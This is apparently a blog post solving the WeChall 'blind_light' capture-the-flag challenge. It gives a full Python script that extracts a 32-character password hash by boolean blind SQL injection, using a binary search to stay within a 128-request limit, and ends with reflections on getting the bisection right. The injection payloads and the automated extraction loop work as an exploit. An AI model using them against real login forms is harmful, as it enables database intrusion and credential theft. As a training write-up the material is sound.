一個盲注(附盲注腳本)

這兩天做這個Wechall的盲注，本來不想發Wechall的題解，但是這個題拖了我兩天時間，發出來紀念下…………

題目鏈接

就是個簡單的盲注，正誤通過頁面有無關鍵字確定。但是有請求次數限制，128次。

需要我猜的密碼，長度是32，每一位組成元素有16種可能。也就是說，如果順序查找，按算法復雜度O(n)算，一位最多可能跑16次，遠超128次限制。所以考慮用二分法來猜，二分法算法復雜度O(logn)，剛好，每一位猜4次一定能猜出來，總共128次。

然后，因為主要限制是比較次數，所以猜一個字符時，只比較一次，即是否大於等於。

解題腳本如下：

import requests
import string

url = "http://www.wechall.net/challenge/blind_light/index.php"
cookies = {'WC': 'XXXXXX'}
success_flag = "Welcome back, user. You would now be logged in"
count = 0
proxy = {
    'http': 'socks5://127.0.0.1:1080',
    'https': 'socks5://127.0.0.1:1080'
}
bit_list = list('0123456789ABCDEF')
ac_dict = dict()


def init_ac_dict():
    for i, bit in enumerate(bit_list):
        ac_dict[i] = 0


def debug(msg):
    if debug_mode:
        print "[*]", msg


def getdata_for_onebit(position, payload):
    '''
    payload like: 1' or mid(length(b.password),{position},1)>=char({ascii})#
    '''
    start_bit = 0
    end_bit = len(bit_list) - 1

    while end_bit >= start_bit:
        mid = start_bit + int(round((float(end_bit)-float(start_bit))/2))
        debug("start_bit: {}, end_bit: {}, mid: {}".format(
            start_bit, end_bit, mid))

        now_payload = payload.format(position=position, ascii=bit_list[mid])
        debug("Sending Payload: \""+now_payload+'"')
        while True:
            try:
                rq = requests.post(url, data={
                                   'injection': now_payload, 'inject': 'inject'}, cookies=cookies, timeout=None, proxies=proxy)
            except Exception as e:
                raise e
            else:
                break
        if success_flag in rq.content:
            debug("Last Payload Success")
            if end_bit == mid:
                start_bit = end_bit
                break
            else:
                start_bit = mid
        else:
            debug("Last Payload Error")
            if end_bit == mid:
                break
            else:
                end_bit = mid - 1
    debug(bit_list[start_bit])
    return bit_list[start_bit]


def get_password_length():
    payload = "1' or mid(length(b.password),{position},1)>='{ascii}'#"
    bit_position = 1
    result = ""
    while bit_position <= 2:
        debug("Getting {}th bit".format(bit_position))
        temp = getdata_for_onebit(bit_position, payload)
        if temp is None:
            break
        else:
            result += temp
        bit_position += 1
    return result


def get_password(length):
    payload = "1' or mid(b.password,{position},1)>='{ascii}'#"
    bit_position = 1
    result = ""
    while bit_position <= length:
        debug("Getting {}th bit".format(bit_position))
        temp = getdata_for_onebit(bit_position, payload)
        if temp is None:
            break
        else:
            result += temp
        bit_position += 1
    return result

if __name__ == '__main__':
    debug_mode = True
    while True:
        password = get_password(32)
        rq = requests.post(url, data={
                           'thehash': password, 'mybutton': 'Enter'}, cookies=cookies, timeout=None, proxies=proxy)
        if 'We are sorry but it took you' in rq.content or "Your answer is wrong" in rq.content:
            print "[*] Not PASS", '.'*8, password
            print rq.content
            exit(998)
            rq = requests.get(
                url+"?reset=me", cookies=cookies, timeout=None, proxies=proxy)
        else:
            print "[!] PASS", '.'*8, password
            break

哎，其實主要是二分法老是寫錯。最開始我用的不是>=而是>，這樣平均會多一次請求。

如果用>判斷，要找的位置會大於等於左側，小於等於右側，所以最后可能需要多一次判斷，看是左側值還是右側值。

但是用>=判斷，要找的位置會大於等於左側，小於右側，少了一次判斷。

哎，沒想到連二分法都不會寫了……發博客警示下自己……